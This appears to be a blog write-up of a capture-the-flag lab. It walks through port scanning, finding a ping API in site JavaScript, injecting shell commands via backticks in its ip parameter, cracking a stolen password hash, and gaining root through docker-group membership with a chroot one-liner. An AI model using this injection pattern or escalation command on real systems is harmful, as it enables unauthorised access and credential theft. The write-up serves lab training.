Exploit an OS command injection vulnerability, acquire ssh credentials and escalate privileges using a user group assignment mistake.

Access this machine here

Room backstory

It’s enumeration time!

As is the norm, we first do an nmap scan of the given IP to find any open ports.The complete port scan (1–65535) is completely justified as a fast top 1000 port scan won’t be sufficient for the responses needed here.

$ nmap -p 1–65535 <IP> -T5 | tee nmap.out

T5 - set the scan speed to “insane” according to nmap.

| - pipe output of the scan to the command on the right side.

tee nmap.out - save piped output to nmap.out while output of the scan is still displayed on the terminal.

Which software is using the port 8081?

$ nmap -sV -p 8081 <IP>

Which other non-standard port is used?

The nmap scan result includes a port number that looks like leetspeak.That’s it.

Which software using this port?

$ nmap -sV -p <PORT> <IP>

The software using the port 8081* is a REST api, how many of its routes are used by the web application?

A bruteforce of the directories should do the trick here. We therefore assume the number of directories discovered point to the number of routes.

Let the fun begin

There is a database lying around, what is its filename?

Checking the directories on the web server running on port 8081 returns nothing helpful so we turn to the only other port running a web server. Port 31331!(leetspeak from earlier)

We first visit the url.

We’re first greeted by this ultratech website

Other than that we find a bad attempt at hiding a note (white text on white background. Cliché)

and a comment probably implying a dead end after viewing the source, or is it?No, it really is a dead end.

We therefore opt for a web directory brute force to find any hidden directories.

Browsing through the discovered directories, only /js looks to have something.

The /js directory contains JavaScript code used by the website and scraping through it we find an interesting one, api.js

The checkAPIstatus() function runs a ping command to the address supplied by the machine trying to gain access.And since the getAPIURL() function uses the IP address and port 8081, we substitute accordingly the value of “const url”

This is what we finally have and use it on the browser;

http://<IP:8081>/ping?ip=<IP>

This could be an indicator of command injection. We can try introducing system commands to the url in place of the second <IP>. After several attempts at inputting the ls command, we find out that wrapping with the backtick. Therefore,

http://<IP:8081>/ping?ip=`<command>`

Attempting with an ls command;

There is a database lying around, what is its filename?

ls command above solves this.

What is the first user’s password hash?

cat the database

What is the password associated with this hash?

The password hash can be cracked using Crackstation,

The root of all evil

What are the first 9 characters of the root user’s private SSH key?

We first ssh into the machine using the credentials found in the previous task.

This task calls for privilege escalation to root. The username r00t shouldn’t be confused with root though. So we have no access to the root directory, trust me, I naively tried cd-ing into it.Don’t fall for that too :)

We check whether this user can run any commands as root. Nothing.

Checking the SUID files also gives nothing we can use.

Checking the id command, this user belongs to docker group.

We can exploit this by visiting GTFObins and find an exploit vector.

We luckily find an entry for docker but we need to check the images in the machine.

Running “docker ps -a” shows us an image called “bash”.

Entering this command should therefore get us root.

docker run -v /:/mnt --rm -it bash chroot /mnt sh

We got root!

The ssh key can be found in /root/.ssh/id_rsa .

Follow for more of the same.Cheers!